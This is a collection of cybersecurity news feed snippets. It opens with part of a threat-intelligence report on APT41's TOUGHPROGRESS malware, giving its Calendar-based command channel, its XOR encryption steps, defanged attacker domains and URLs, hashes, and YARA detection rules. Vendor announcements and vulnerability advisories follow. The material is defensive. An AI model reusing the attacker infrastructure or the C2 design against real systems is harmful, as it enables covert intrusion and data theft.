tactic. Due to the indirect calls and arithmetic operations, the disassembler cannot accurately recreate a control flow graph. Calendar C2 TOUGHPROGRESS has the capability to read and write events with an attacker-controlled Google Calendar. Once executed, TOUGHPROGRESS creates a zero minute Calendar event at a hardcoded date, 2023-05-30, with data collected from the compromised host being encrypted and written in the Calendar event description.  The operator places encrypted commands in Calendar events on 2023-07-30 and 2023-07-31, which are predetermined dates also hardcoded into the malware. TOUGHPROGRESS then begins polling Calendar for these events. When an event is retrieved, the event description is decrypted and the command it contains is executed on the compromised host. Results from the command execution are encrypted and written back to another Calendar event. In collaboration with the Mandiant FLARE team, GTIG reverse engineered the C2 encryption protocol leveraged by TOUGHPROGRESS. The malware uses a hardcoded 10-byte XOR key and generates a per-message 4-byte XOR key. Compress message with LZNT1 Encrypt the message with a 4-byte XOR key Append the 4-byte key at the end of a message header (10 bytes total) Encrypt the header with the 10-byte XOR key Prepend the encrypted header to the front of the message The combined encrypted header and message is the Calendar event description Figure 5: TOUGHPROGRESS encryption routine for Calendar Event Descriptions Figure 6: Example of a Calendar event created by TOUGHPROGRESS Disrupting Attackers to Protect Google, Our Users, and Our Customers GTIG’s goal is not just to monitor threats, but to counter and disrupt them. At Google, we aim to protect our users and customers at scale by proactively blocking malware campaigns across our products.  To disrupt APT41 and TOUGHPROGRESS malware, we have developed custom fingerprints to identify and take down attacker-controlled Calendars. We have also terminated attacker-controlled Workspace projects, effectively dismantling the infrastructure that APT41 relied on for this campaign. Additionally, we updated file detections and added malicious domains and URLs to the Google Safe Browsing blocklist.  In partnership with Mandiant Consulting, GTIG notified the compromised organizations. We provided the notified organizations with a sample of TOUGHPROGRESS network traffic logs, and information about the threat actor, to aid with detection and incident response. Protecting Against Ongoing Activity GTIG has been actively monitoring and protecting against APT41’s attacks using Workspace apps for several years. This threat group is known for their creative malware campaigns, sometimes leveraging Workspace apps.  Google Cloud’s Office of the CISO published the April 2023 Threat Horizons Report detailing HOODOO’s use of Google Sheets and Google Drive for malware C2. In October 2024, Proofpoint published a report attributing the VOLDEMORT malware family to APT41.  The DUSTTRAP malware family, reported by GTIG and Mandiant in July of 2024, used Public Cloud hosting for C2. In each case, GTIG identified and terminated the attacker-controlled Workspace projects and infrastructure APT41 relied on for these campaigns. Free Web Hosting Infrastructure Since at least August 2024, we have observed APT41 using free web hosting tools for distributing their malware. This includes VOLDEMORT, DUSTTRAP, TOUGHPROGRESS and likely other payloads as well. Links to these free hosting sites have been sent to hundreds of targets in a variety of geographic locations and industries.  APT41 has used Cloudflare Worker subdomains the most frequently. However, we have also observed use of InfinityFree and TryCloudflare. The specific subdomains and URLs here have been observed in previous campaigns, but may no longer be in use by APT41. Cloudflare Workers word[.]msapp[.]workers[.]dev  cloud[.]msapp[.]workers[.]dev  TryCloudflare term-restore-satisfied-hence[.]trycloudflare[.]com ways-sms-pmc-shareholders[.]trycloudflare[.]com InfinityFree resource[.]infinityfreeapp[.]com pubs[.]infinityfreeapp[.]com APT41 has also been observed using URL shorteners in their phishing messages. The shortened URL redirects to their malware hosted on free hosting app subdomains.  https[:]//lihi[.]cc/6dekU https[:]//tinyurl[.]com/hycev3y7 https[:]//my5353[.]com/nWyTf https[:]//reurl[.]cc/WNr2Xy All domains and URLs in this blog post have been added to the Safe Browsing blocklist. This enables a warning on site access and prevents users from downloading the malware.  Indicators of Compromise The IOCs in this blog post are also available as a collection in Google Threat Intelligence. Hashes   Name Hashes (SHA256 / MD5) 出境海關申報清單.zip 469b534bec827be03c0823e72e7b4da0b84f53199040705da203986ef154406a 876fb1b0275a653c4210aaf01c2698ec 申報物品清單.pdf.lnk 3b88b3efbdc86383ee9738c92026b8931ce1c13cd75cd1cda2fa302791c2c4fb 65da1a9026cf171a5a7779bc5ee45fb1 6.jpg 50124174a4ac0d65bf8b6fd66f538829d1589edc73aa7cf36502e57aa5513360 1ca609e207edb211c8b9566ef35043b6 7.jpg 151257e9dfda476cdafd9983266ad3255104d72a66f9265caa8417a5fe1df5d7 2ec4eeeabb8f6c2970dcbffdcdbd60e3 Domains word[.]msapp[.]workers[.]dev  cloud[.]msapp[.]workers[.]dev  term-restore-satisfied-hence[.]trycloudflare[.]com ways-sms-pmc-shareholders[.]trycloudflare[.]com resource[.]infinityfreeapp[.]com  pubs[.]infinityfreeapp[.]com URL Shortener Links https[:]//lihi[.]cc/6dekU https[:]//lihi[.]cc/v3OyQ https[:]//lihi[.]cc/5nlgd https[:]//lihi[.]cc/edcOv https[:]//lihi[.]cc/4z5sh https[:]//tinyurl[.]com/mr42t4yv https[:]//tinyurl[.]com/hycev3y7 https[:]//tinyurl[.]com/mpa2c5wj https[:]//tinyurl[.]com/3wnz46pv https[:]//my5353[.]com/ppOH5 https[:]//my5353[.]com/nWyTf https[:]//my5353[.]com/fPUcX https[:]//my5353[.]com/ZwEkm https[:]//my5353[.]com/vEWiT https[:]//reurl[.]cc/WNr2Xy Calendar 104075625139-l53k83pb6jbbc2qbreo4i5a0vepen41j.apps.googleusercontent.com https[:]//www[.]googleapis[.]com/calendar/v3/calendars/ff57964096cadc1a8733cf566b41c9528c89d30edec86326c723932c1e79ebf0@group.calendar.google.com/events YARA Rules rule G_Backdoor_TOUGHPROGRESS_LNK_1 { meta: author = "GTIG" date_created = "2025-04-29" date_modified = "2025-04-29" md5 = "65da1a9026cf171a5a7779bc5ee45fb1" rev = 1 strings: $marker = { 4C 00 00 00 } $str1 = "rundll32.exe" ascii wide $str2 = ".\\image\\7.jpg,plus" wide $str3 = "%PDF-1" $str4 = "PYL=" condition: $marker at 0 and all of them } rule G_Dropper_PLUSDROP_1 { meta: author = "GTIG" date_created = "2025-04-29" date_modified = "2025-04-29" md5 = "9492022a939d4c727a5fa462590dc0dd" rev = 1 strings: $decrypt_and_launch_payload = { 48 8B ?? 83 ?? 0F 0F B6 ?? ?? ?? 30 04 ?? 48 FF ?? 49 3B ?? 72 ?? 80 [1-5] 00 75 ?? B? 5B 55 D2 56 [0-8] E8 [4-32] 33 ?? 33 ?? FF D? [0-4] FF D? } condition: uint16(0) == 0x5a4d and all of them } Additional YARA Rules This is a second dropper used to launch PLUSDROP in another TOUGHPROGRESS campaign. rule G_Dropper_TOUGHPROGRESS_XML_1 { meta: author = "GTIG" description = "XML lure file used to launch a PLUSDROP dll." md5 = "dccbb41af2fcf78d56ea3de8f3d1a12c" strings: $str1 = "System.Convert.FromBase64String" $str2 = "VirtualAlloc" $str3 = ".InteropServices.Marshal.Copy" $str4 = ".DllImport" $str5 = "kernel32.dll" $str6 = "powrprof.dll" $str7 = ".Marshal.GetDelegateForFunctionPointer" condition: uint16(0)!= 0x5A4D and all of them and filesize > 500KB and filesize < 5MB } PLUSBED is an additional stage observed in other TOUGHPROGRESS campaigns. rule G_Dropper_PLUSBED_2 { meta: author = "GTIG" date_created = "2025-04-29" date_modified = "2025-04-29" md5 = "39a46d7f1ef9b9a5e40860cd5f646b9d" rev = 1 strings: $api1 = { BA 54 B8 B9 1A } $api2 = { BA 78 1F 20 7F } $api3 = { BA 62 34 89 5E } $api4 = { BA 65 62 10 4B } $api5 = { C7 44 24 34 6E 74 64 6C 66 C7 44 24 38 6C 00 FF D0 } condition: uint16(0) != 0x5A4D and all of them }

Summary In recent months, the Netskope Threat Labs team has observed several different campaigns delivering the PureHVNC RAT and its plugins. In 2024, the same malware was observed being delivered via a Python chain, and a few days ago, it was also observed using genAI sites to lure victims. In this blog post, we’ll describe […] The post PureHVNC RAT Using Fake High-level Job Offers from Fashion and Beauty Brands appeared first on Netskope.

Cybersecurity researchers have discovered a security flaw in Microsoft's OneDrive File Picker that, if successfully exploited, could allow websites to access a user's entire cloud storage content, as opposed to just the files selected for upload via the tool. "This stems from overly broad OAuth scopes and misleading consent screens that fail to clearly explain the extent of access being granted,...

We’re thrilled to announce that RiskRecon has been recognized in Gartner’s 2025 Market Guide for Third-Party Risk Management (TPRM) Technology Solutions. This recognition is a testament to our continued innovation and leadership in helping organizations manage third-party cyber risk with precision and confidence.

Portnox was also a finalist for Innovation of the Year.   AUSTIN, TX – May 28, 2025 – Portnox, a leading provider of cloud-native, zero trust access control solutions, today announced that Portnox Cloud was named runner-up for Cloud-Based Solution of the Year for the second year in a row at the 2025 Network Computing… The post Portnox Named Cloud-Based Solution of the Year Runner-Up at 2025 Network Computing Awards appeared first on Portnox.

Meet the elite squad that’s hunting the next major cyberattack. With more than 150 years of combined research experience and expert analysis, the Tenable Research Special Operations team arms organizations with the critical and actionable intelligence necessary to proactively defend the modern attack surface. The digital battlefield is constantly shifting. It's no longer enough to just react. We need to anticipate. Massive data breaches leave consumers exposed to identity thieves, ransomware attacks cripple hospitals, and Nation State actors disrupt critical infrastructure. It's not just about vulnerable software anymore. In our hyper-connected world, from the smart devices in your home to the complex systems running our cities, everything is a potential target. The explosion of cloud services and AI is accelerating this risk, creating countless new windows for cybercriminals and hostile nations to exploit. From software and hardware vulnerabilities, to misconfigurations, compromised identities, overexposed and highly privileged environments, and publicly accessible databases, the threat landscape is everywhere, all at once. As of October 2024, over 240,000 Common Vulnerabilities and Exposures (CVEs) have been tracked through the MITRE CVE program, including many that have significantly impacted consumers, businesses and governments. The volume has historically been too much for security teams to keep up with. Beyond the sheer increase in the volume of traditional vulnerabilities, defenders are faced with an ever-expanding attack surface as enterprises have adopted remote work and new technologies like Generative AI that all contribute to increases in both the number and complexity of exposures that elevate the likelihood of business impacts.But what if there was a team dedicated to seeing these threats coming, understanding the tactics being used by adversaries, and sending early warning signals for what might come next?Introducing the Tenable Research Special Operations (RSO) Team – the next milestone in the evolution of the Research teams and capabilities that Tenable brings to bear, and designed to operate at the forefront of the fight.The "special ops" of cybersecurity: What you need to knowSince 2018, Tenable’s Security Response Team (SRT) has monitored the cybersecurity landscape, aggregating and assessing insights from hundreds of sources daily to provide unique insights via Cyber Exposure Alerts and related advisory content. In that same year, we formalized our reverse engineering efforts, founding the Zero-Day Research team; that team’s research efforts have resulted in the discovery and disclosure of more than 500 zero-day vulnerabilities since its formation. In 2023, we launched the Decision Science Operations team to provide improved support for decision making through quantitative analysis techniques and the application of appropriate technologies augmenting human intelligence and analysis. Today, the RSO team serves as Tenable’s Forward Logistics Element in the threat landscape, providing customers with the analyses and contextualized exposure intelligence required to manage risks to critical business assets. With over 150 years of collective expertise, this hand-picked group of world-class security researchers is united with one mission: to cut through the noise and deliver critical intelligence about the most dangerous cyber threats emerging right now. Uniting the missions of the Tenable Security Response, Zero-Day Research, and Decision Science Operations teams, RSO disseminates timely, accurate, and actionable information about the latest threats and exposures.How? RSO is laser-focused on the "capability meets opportunity" equationCapability: What are the attackers able to do? What tools, resources, and strategies do they have?Opportunity: What weaknesses exist in our systems that attackers can exploit?By analyzing both sides of this equation, the RSO team can predict potential attacks and pinpoint exactly where the biggest points of exposure reside. This isn't just theoretical; it's about providing real-time, actionable insights that can literally save businesses – and potentially, lives – from devastating cyberattacks.The RSO team's research goes beyond generic warnings. Not every risk is created equal. We understand that what’s critical for a power grid isn’t the same as what’s critical for a retail chain. Threat context is key to determining risk levels. Our insights are tailored, helping organizations across different industries and regions prioritize the threats that matter most to their specific operations.Here's what this elite team is digging into – and why you should pay attentionKnown and emergent exploits: Covering the vulnerabilities we already track and finding brand new ones before criminals can weaponize them.Nation-state and cybercriminal tactics: Uncovering the latest moves from sophisticated hacking groups and foreign governments.AI and emerging tech risks: Assessing the hidden dangers in the newest technologies, like advanced AI models (DeepSeek) and cutting-edge coding protocols (Model Context Protocol, Vibe Coding)."Old dog, new tricks" exploits: Discovering how hackers are re-purposing old vulnerabilities for devastating new attacks.The science of decision-making: Providing data-driven insights to help organizations make smarter security choices.New and existing analysis and insights from Tenable RSO can be found on the Tenable Blog, the Tenable Research page and the Tenable Connect Community.Recent research content from the Tenable RSO TeamCVE-2025-32756: Zero-Day Vulnerability in Multiple Fortinet Products Exploited in the WildCVE-2025-4427, CVE-2025-4428: Ivanti Endpoint Manager Mobile (EPMM) Remote Code ExecutionFrequently Asked Questions about Vibe CodingMCP Prompt Injection: Not Just For EvilFrequently Asked Questions About Model Context Protocol (MCP) and Integrating with AI for Agentic ApplicationsDeepSeek Deep Dive Part 1: Creating Malware, Including Keyloggers and RansomwareFrequently Asked Questions About DeepSeek Large Language Model (LLM)Salt Typhoon: An Analysis of Vulnerabilities Exploited by this State-Sponsored ActorMicrosoft Patch Tuesday 2024 Year in ReviewVolt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors

18 juni 2025, 10:30 - 11:15 Er din organisation klar til at leve op til de skærpede cybersikkerhedskrav i NIS2-direktivet? Med NIS2 stiller EU nye og mere omfattende krav til cybersikkerheden i både offentlige og private organisationer – særligt dem, der opererer i samfundskritiske sektorer. Det stiller højere krav til overvågning, hændelseshåndtering og [...] The post Sådan understøtter Logpoint NIS2-kravene til hændelseshåndtering appeared first on Logpoint.

Embedded Linux-based Internet of Things (IoT) devices have become the target of a new botnet dubbed PumaBot. Written in Go, the botnet is designed to conduct brute-force attacks against SSH instances to expand in size and scale and deliver additional malware to the infected hosts. "Rather than scanning the internet, the malware retrieves a list of targets from a command-and-control (C2) server...

The latest in a long line of techies to face Putin’s wrath A Russian programmer will face the next 14 years in a "strict-regime" (high-security) penal colony after a regional court ruled he leaked sensitive data to Ukraine.

New Duo IAM delivers comprehensive identity security that organizations can trustMore RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

Duo is officially expanding into the IAM market, bringing our trusted security expertise to an area long overdue for disruption. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

New Duo IAM delivers comprehensive identity security that organizations can trustMore RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

New Duo IAM delivers comprehensive identity security that organizations can trustMore RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

Duo is officially expanding into the IAM market, bringing our trusted security expertise to an area long overdue for disruption. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

Open-source doesn’t just offer better tooling — it offers a better way of working.

Every summer, as the temperature rises across the U.S., families, young children, and other people looking to cool down flock to fill our 10.7 million private and public pools. Yet, what the New York Times calls a ‘public health crisis’ lurks in waiting.

Stealer malware no longer just steals passwords. In 2025, it steals live sessions—and attackers are moving faster and more efficiently than ever. While many associate account takeovers with personal services, the real threat is unfolding in the enterprise. Flare’s latest research, The Account and Session Takeover Economy, analyzed over 20 million stealer logs and tracked attacker activity across...

Hospitals today are no longer just centers of care. They are intricate digital ecosystems where every function, from diagnostics to discharge, depends on interconnected technology, a fact that makes cybersecurity in healthcare critical. As digital transformation accelerates across the sector, its exposure to cyber risk grows as well. Attacks on healthcare systems have surged dramatically, […] The post Cybersecurity in Healthcare: Defending Patient Safety with Deception Technology appeared first on CounterCraft.

A financially motivated threat actor has been observed exploiting a recently disclosed remote code execution flaw affecting the Craft Content Management System (CMS) to deploy multiple payloads, including a cryptocurrency miner, a loader dubbed Mimo Loader, and residential proxyware. The vulnerability in question is CVE-2025-32432, a maximum severity flaw in Craft CMS that was patched in...

AI automation is a top priority for CISOs, though data quality, privacy, and a lack of in-house expertise are common hurdles

Gamers of a certain age likely remember the video game Asteroids. You played as a little triangular spacecraft shooting at big space rocks that started traveling towards you slowly at first, then gained speed. As you revolved around trying to protect yourself by shooting them, you inevitably had to make some rapid decisions about which […] The post The Importance of Triage in Incident Response appeared first on Graylog.

A comprehensive historical breakdown of Zanubis' changes, including RC4 and AES encryption, credentials stealing and new targets in Peru, provided by Kaspersky GReAT experts.

Poor password management is responsible for thousands of data breaches, but it doesn’t have to be this way. Sponsored feature  The IT business likes to reinvent things as quickly as possible. Except passwords, that is. We've been using them since Roman times, only now they're digital. They're the fungal skin disease of tech; irritating and hard to get rid of.

Kubernetes has gone from experiment to essential — powering everything from fintech apps to telecom infrastructure and government services. But... The post Conoa and Sysdig: A powerful partnership for comprehensive cloud and container security appeared first on Sysdig.

Incorrect connection releasing causing pool exhaustion (CVE-2025-3864) has been found in hackney software.

Kubernetes has gone from experiment to essential — powering everything from fintech apps to telecom infrastructure and government services. But... The post Conoa and Sysdig: A powerful partnership for comprehensive cloud and container security appeared first on Sysdig.

Would you expect an end user to log on to a cybercriminal’s computer, open their browser, and type in their usernames and passwords? Hopefully not! But that’s essentially what happens if they fall victim to a Browser-in-the-Middle (BitM) attack. Like Man-in-the-Middle (MitM) attacks, BiTM sees criminals look to control the data flow between the victim’s computer and the target service, as...

Cybersecurity researchers have disclosed details of a coordinated cloud-based scanning activity that targeted 75 distinct "exposure points" earlier this month. The activity, observed by GreyNoise on May 8, 2025, involved as many as 251 malicious IP addresses that are all geolocated to Japan and hosted by Amazon. "These IPs triggered 75 distinct behaviors, including CVE exploits,...

Santa Clara, Calif. May 28, 2025 – Recently, global research and advisory firm Forrester released The Network Analysis and Visibility (NAV) Solutions Landscape, Q2 2025, offering a comprehensive analysis of market dynamics, technology trends, and product capabilities. NSFOCUS has once again [1] been included in this report. Forrester’s reports on specific technical fields are highly recognized worldwide. […] The post NSFOCUS Recognized by Forrester in The Network Analysis and Visibility (NAV) Solution Landscape appeared first on NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks..

Santa Clara, Calif. May 28, 2025 – Recently, global research and advisory firm Forrester released The Network Analysis and Visibility (NAV) Solutions Landscape, Q2 2025, offering a comprehensive analysis of market dynamics, technology trends, and product capabilities. NSFOCUS has once again [1] been included in this report. Forrester’s reports on specific technical fields are highly recognized worldwide. […] The post NSFOCUS Recognized by Forrester in The Network Analysis and Visibility (NAV) Solution Landscape appeared first on NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks..

Apple, in its latest App Store fraud analysis, revealed that the company prevented more than $2 billion in potentially fraudulent transactions in 2024 alone. This contributes to a staggering total of $9 billion in fraudulent activities thwarted since 2019.   With more than 813 million visitors weekly and active operations in 175 regions, maintaining the platform’s integrity requires Apple to protect its users and upgrade defenses. Here is a quick breakdown of the 2024 Apple App Store fraud analysis.  A Layered Defense Against Fraudulent Transactions  To address a rising tide of deceptive tactics, Apple employs a multi-pronged strategy that includes both automated systems and human oversight. In 2024, Apple rejected over 1.9 million app submissions for not meeting the platform’s stringent standards, which include checks for reliability, privacy, and potential fraud. Of these, 400,000 apps were denied specifically for privacy violations, while over 320,000 were flagged for spam, copying, or misleading content.  App Review remains a cornerstone of Apple’s defense mechanism, with a team that reviews an average of 150,000 app submissions each week. In total, over 7.7 million submissions were assessed in 2024. Apple reports that more than 37,000 apps were removed for fraudulent activity, many of which were linked to broader developer networks attempting to bypass scrutiny. One method fraudsters use is hiding deceptive features in apps that only activate after passing initial review. In response, Apple rejected over 43,000 submissions for containing hidden or undocumented features in 2024.  Cracking Down on App Store Fraud  Fraud isn’t limited to apps. Apple also cracked down on account abuse, a common gateway for malicious activity. Last year, more than 146,000 developer accounts were terminated due to fraud, and another 139,000 developer enrollment attempts were rejected outright.  On the consumer side, Apple took decisive action by rejecting over 711 million customer account creation attempts and deactivating nearly 129 million accounts. These accounts often aim to manipulate the App Store’s ratings, reviews, and rankings, distorting the marketplace and undermining legitimate developers.  Apple also extended its scrutiny beyond the App Store’s borders. In 2024, the company detected and blocked over 10,000 unauthorized apps on pirate storefronts, preventing nearly 4.6 million attempts to install or launch apps from unapproved sources.  Fighting App Store Discovery Fraud  Another important front in Apple’s anti-fraud battle is the discovery of fraud apps and developers that manipulate rankings and visibility through artificial means. In 2024, Apple processed more than 1.2 billion ratings and reviews, removing over 143 million fraudulent entries that sought to game the system. The company also removed more than 7,400 apps from App Store charts and nearly 9,500 deceptive apps from search results, leveling the playing field for developers in good standing.  A major highlight of the 2024 App Store fraud analysis was Apple’s protection of its payment infrastructure. Using technologies such as Apple Pay and StoreKit, Apple prevented over $2 billion in fraudulent transactions last year. The company also detected and blocked the use of 4.7 million stolen credit cards and banned over 1.6 million accounts from conducting further transactions.  Apple emphasizes the security advantages of Apple Pay, which utilizes a unique device-specific number and transaction code for each purchase. This means actual card numbers are neither stored on the device nor shared with developers, further mitigating risks.  More than 420,000 apps now utilize StoreKit to power in-app purchases, which Apple says are processed with built-in fraud detection, end-to-end encryption, and user control tools like purchase history, refund support, and subscription management.

Go to Device Platform Intelligence Added Platforms 26 Platforms are added Platform Name Node Type2 Node Type Bootwin CPC220-JF Industrial Computer ICS/OT IoT/OT DrayTek Vigor 166 Router Router/Gateway Router Google Pixel 9a Phone Mobile Phone Mobile Device Honor 300 Ultra Phone Mobile Phone Mobile Device Honor 400 Phone Mobile Phone Mobile Device Honor 400 Pro […]

Overview The U.S. Federal Bureau of Investigation (FBI) has issued a fresh alert warning law firms and cybersecurity professionals about ongoing cyber threat activity linked to the Silent Ransom Group (SRG)—also known as Luna Moth, Chatty Spider, or UNC3753. This threat actor is ramping up operations in 2025, with an increasingly aggressive campaign specifically targeting the legal sector across the United States. Operating since 2022, Silent Ransom Group expanded its tactics in 2025, shifting from callback phishing emails to direct phone-based social engineering. In this tactic, attackers impersonate IT staff to gain unauthorized remote access. Once inside, they exfiltrate sensitive data and demand ransom payments under the threat of public exposure. According to Cyble’s Research and Intelligence Labs (CRIL) researchers, SRG is a financially motivated threat actor that executes callback phishing campaigns without using malware or encryption. “By impersonating IT help desks, they trick employees into installing legitimate RMM tools to gain access and exfiltrate data via tools like WinSCP and Rclone,” CRIL’s researchers said. “They operate with call centers, use tailored infrastructure, and demand ransoms up to $800,000 under the threat of exposure.” Why Law Firms Are Now a Prime Target While Silent Ransom Group has targeted various sectors, including insurance and healthcare, the legal industry has become the group’s focal point since spring 2023. According to the FBI, the motivation is clear: law firms hold highly sensitive information, including intellectual property, financial records, and confidential legal strategies—data that can be exploited or sold for significant gain. SRG's choice of targets indicates a calculated approach: exploiting industries with low tolerance for data exposure and high incentive to pay ransoms quickly and discreetly. Inside the Attack Chain: Callback Phishing and Fake IT Support SRG's hallmark technique has been callback phishing, which tricks targets into calling a fake support number under the guise of resolving bogus subscription charges. These emails, often appearing to be from legitimate vendors, claim small unauthorized charges—usually under $50—to lower suspicion. Victims are instructed to call a number to cancel the charge. Once the target calls, SRG actors send a link to download remote access software—commonly Zoho Assist, AnyDesk, or Syncro—under the pretense of processing the cancellation. After the tool is installed, the attacker silently establishes persistent access. Figure 1. Tools used by the Silent Ransom Group and their use (Source: CRIL) By March 2025, SRG had escalated its tactics by conducting direct phone calls, impersonating IT staff within the victim’s company. Employees are told to join a remote session for “overnight maintenance,” again opening the door for attackers to bypass endpoint protection. Fast, Quiet, and Dangerous: How SRG Exfiltrates Data Once remote access is achieved, SRG wastes no time. Minimal privilege escalation is needed. Data exfiltration tools like WinSCP (Windows Secure Copy) or a stealthy version of Rclone are used immediately. If the compromised machine lacks admin privileges, SRG utilizes portable versions of WinSCP to extract data without detection. The process is silent, fast, and rarely flagged by antivirus software. Once data is exfiltrated, victims receive ransom emails threatening public release unless payment is made. In many cases, SRG follows up with harassing phone calls to company employees, further pressuring firms into negotiation. Indicators of Compromise (IOCs) The FBI notes that SRG leaves behind minimal digital footprints. Traditional detection mechanisms may not trigger alerts. However, defenders are advised to watch for these potential IOCs: Unauthorized downloads of Zoho Assist, Syncro, AnyDesk, Splashtop, or Atera WinSCP or Rclone activity tied to unknown external IP addresses Emails or voicemails from anonymous entities claiming data theft Subscription-related phishing emails urging callback actions Employees receiving suspicious calls from fake IT support claiming to perform routine maintenance These indicators may not definitively confirm SRG presence but should trigger immediate review and threat hunting protocols. Recommendations for Defenders Given SRG’s reliance on social engineering, remote access tools, and stealthy exfiltration methods, the FBI and Cyble strongly recommend the following mitigation strategies: 1. Conduct Employee Awareness Training Ensure all staff can recognize phishing emails, suspicious calls, and deceptive remote access attempts. Encourage skepticism about unsolicited IT support and unknown subscriptions. 2. Establish Clear IT Authentication Protocols Organizations should develop and communicate strict procedures for how internal IT departments authenticate themselves. Any deviation should raise immediate red flags. 3. Limit Remote Access Privileges Disable administrative privileges on employee devices where unnecessary. Implement allowlists for remote access software. 4. Monitor for Unauthorized Tool Usage Deploy endpoint detection and response (EDR) tools capable of flagging unapproved installations of WinSCP, Rclone, or remote desktop utilities. 5. Backup and Isolate Critical Data Maintain encrypted, air-gapped backups of essential legal and client files. Test restore procedures regularly to ensure resilience. 6. Implement Multifactor Authentication (MFA) Require MFA across all employee accounts, especially those with access to sensitive systems or privileged credentials. Social Engineering is Outpacing Malware The Silent Ransom Group exemplifies a growing trend in modern cybercrime: human-centered attack vectors that bypass technical controls altogether. By leveraging psychology and trust, SRG infiltrates even well-defended organizations without needing to exploit vulnerabilities or drop malware. Law firms are ideal targets due to their reputation-centric business models and access to confidential data. These attacks show the importance of treating social engineering threats with the same urgency as traditional cyber intrusions. With attackers evolving their playbooks every few months, defenders must evolve faster. References: https://www.ic3.gov/CSA/2025/250523.pdf The post FBI Warns Silent Ransom Group Targeting U.S. Law Firms Using Social Engineering and Callback Phishing appeared first on Cyble.

A newly identified Russian cyber-espionage group, dubbed Laundry Bear, has been linked to the September 2024 security breach of the Dutch national police, according to a joint advisory from Dutch intelligence agencies. The breach, first disclosed by the Dutch police (Politie) last year, resulted in the theft of work-related contact details belonging to multiple officers. The stolen information included names, email addresses, phone numbers, and in some instances, private personal data. On Tuesday, the Dutch General Intelligence and Security Service (AIVD) and the Military Intelligence and Security Service (MIVD) attributed the attack to Laundry Bear, warning that the group might […] The post Russian Cyberspy Group ‘Laundry Bear’ tied to Dutch Police Breach first appeared on Cybersafe News.

Sophos researchers have uncovered a cyberattack in which a DragonForce ransomware operator exploited three chained vulnerabilities in the SimpleHelp remote management tool to compromise a managed service provider (MSP) and its customers. SimpleHelp is remote support and access software commonly used by IT teams to troubleshoot and maintain client systems. The attackers leveraged three recently disclosed vulnerabilities—CVE-2024-57727, CVE-2024-57728, and CVE-2024-57726—to gain initial access and escalate privileges. CVE-2024-57727 (CVSS 7.5): An unauthenticated path traversal flaw that allows attackers to download arbitrary files, including serverconfig.xml, which contains encrypted admin and technician credentials and other sensitive data protected by a hardcoded key. CVE-2024-57728 […] The post DragonForce exploits SimpleHelp flaws to breach MSP first appeared on Cybersafe News.

Apple on Tuesday revealed that it prevented over $9 billion in fraudulent transactions in the last five years, including more than $2 billion in 2024 alone. The company said the App Store is confronted by a wide range of threats that seek to defraud users in various ways, ranging from "deceptive apps designed to steal personal information to fraudulent payment schemes that attempt to exploit...

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Mat Powell of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-28, 9 days ago. The vendor is given until 2025-09-25 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 8.2 AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H severity vulnerability discovered by 'Nitesh Surana (niteshsurana.com) of Trend Research' was reported to the affected vendor on: 2025-05-28, 9 days ago. The vendor is given until 2025-09-25 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Mat Powell of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-28, 9 days ago. The vendor is given until 2025-09-25 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 7.5 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H severity vulnerability discovered by 'Nicholas Zubrisky (@NZubrisky) of Trend Research' was reported to the affected vendor on: 2025-05-28, 9 days ago. The vendor is given until 2025-09-25 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Canon imageCLASS MF656Cdw printers. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-2146.

Mozilla has published the advisories (MFSA2025-42, MFSA2025-43, and MFSA2025-44) to address multiple vulnerabilities in Firefox browser.

Google released a security update to address multiple vulnerabilities in Google Chrome.

Every minute shaved off the remediation process translates to reduced risk and a stronger, more resilient organization.

May 27, 2025Ravie LakshmananData Breach / Social Engineering The U.S. Federal Bureau of Investigation (FBI) has warned of social engineering attacks mounted by a criminal extortion actor known as Luna Moth targeting law firms over the past two years. The campaign leverages “information technology (IT) themed social engineering calls, and callback phishing emails, to gain […]

Multiple vulnerabilities were identified in Google Chrome. A remote attacker could exploit some of these vulnerabilities to trigger sensitive information disclosure, denial of service condition, data manipulation and remote code execution on the targeted system. Impact Denial of Service Remote Code Execution Information Disclosure Data Manipulation System / Technologies affected Google Chrome prior to 137.0.7151.55 (Linux) Google Chrome prior to 137.0.7151.55/56 (Mac) Google Chrome prior to 137.0.7151.55/56 (Windows) Solutions Before installation of the software, please visit the software vendor web-site for more details. Apply fixes issued by the vendor:   Update to version 137.0.7151.55 (Linux) or later Update to version 137.0.7151.55/56 (Mac) or later Update to version 137.0.7151.55/56 (Windows) or later

Data security management is the process of protecting digital information throughout its lifecycle from unauthorized access, corruption, or theft.

Multiple vulnerabilities were identified in Mozilla Products. A remote attacker could exploit some of these vulnerabilities to trigger remote code execution,  denial of service condition, security restriction bypass and sensitive information disclosure on the targeted system. Impact Information Disclosure Remote Code Execution Denial of Service Security Restriction Bypass System / Technologies affected Versions prior to:   Thunderbird 128.11 Thunderbird 139 Firefox ESR 128.11 Firefox ESR 115.24 Firefox 139 Solutions Before installation of the software, please visit the vendor web-site for more details. Apply fixes issued by the vendor:   Thunderbird 128.11 Thunderbird 139 Firefox ESR 128.11 Firefox ESR 115.24 Firefox 139

